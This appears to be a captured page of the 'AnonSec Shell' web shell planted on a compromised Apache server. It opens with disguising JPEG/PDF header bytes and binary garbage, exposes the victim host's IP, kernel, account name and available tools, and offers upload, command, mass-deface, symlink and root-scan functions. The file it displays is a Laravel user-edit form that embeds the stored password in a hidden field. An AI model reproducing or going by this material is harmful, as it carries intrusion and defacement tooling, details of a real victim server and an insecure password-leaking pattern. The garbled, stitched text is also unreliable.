ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY AnonSec Shell
AnonSec Shell
Server IP : 157.90.209.209  /  Your IP : 216.73.216.129   [ Reverse IP ]
Web Server : Apache
System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64
User : evidenciarevista ( 1049)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Domains : 216 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/evidenciarevista/admin/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/evidenciarevista/admin/storage/framework/views/a4868a0908a7bc3ccd34f0be4eec9531
<?php $__env->startSection('content'); ?>
<section class="content-header">
    <h1>
        <?php echo e($user->name); ?>

        <small>Alterar dados</small>
    </h1>
</section>

<!-- Main content -->
<section class="content">


    <div class="box box-success">
        <div class="box-header">
            <h3 class="box-title">Alterar dados</h3>
        </div>
        <div class="box-body">

            <?php echo Form::open(['route' => ['users.update', $user->id] , 'method' => 'put', 'role' => 'form']); ?>


            <div class="col-lg-12">


                <div class="form-group">
                    <?php echo Form::label('Nível do usuário:'); ?>

                    <?php echo Form::select('nivel', ['2' => 'Colunista', '1' => 'Administrador'], $user->nivel, ['class' => 'form-control']); ?>

                </div>


                <div class="form-group">
                    <label>Nome:</label>
                    <input type="text" class="form-control" placeholder="Nome" name="name" required
                    value="<?php echo e($user->name); ?>">
                </div>

                <div class="form-group">
                    <label>Email:</label>
                    <input type="email" class="form-control disabled" placeholder="E-mail" name="email" disabled
                    value="<?php echo e($user->email); ?>">
                </div>


                <div class="form-group">
                    <label>Alterar password:</label>
                    <input type="password" class="form-control" placeholder="Password" name="password">
                </div>
            </div>

            <div class="col-lg-12">

                <label>Pequena descrição:</label><br>
                <?php echo Form::textarea('sobre', $user->sobre, ['class' => 'form-control', 'rows' => '2']); ?>


                <label>Descrição:</label><br>
                <?php echo Form::textarea('description', $user->description, ['class' => 'form-control profile']); ?>


            </div>


            <div class="clearfix"></div>

            <hr>

            <div class="form-group col-lg-12">
                <input type="hidden" name="old_password" value="<?php echo e($user->password); ?>">
                <button type="submit" class="btn bg-purple"><i class="glyphicon glyphicon-refresh"></i> Salvar
                </button>
            </div>
            <?php echo Form::close(); ?>



        </div>
        <!-- /.box-body -->
    </div>
    <!-- /.box -->

</section>
<!-- /.content -->
<?php $__env->stopSection(); ?>
<?php echo $__env->make('master', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>

Anon7 - 2022
AnonSec Team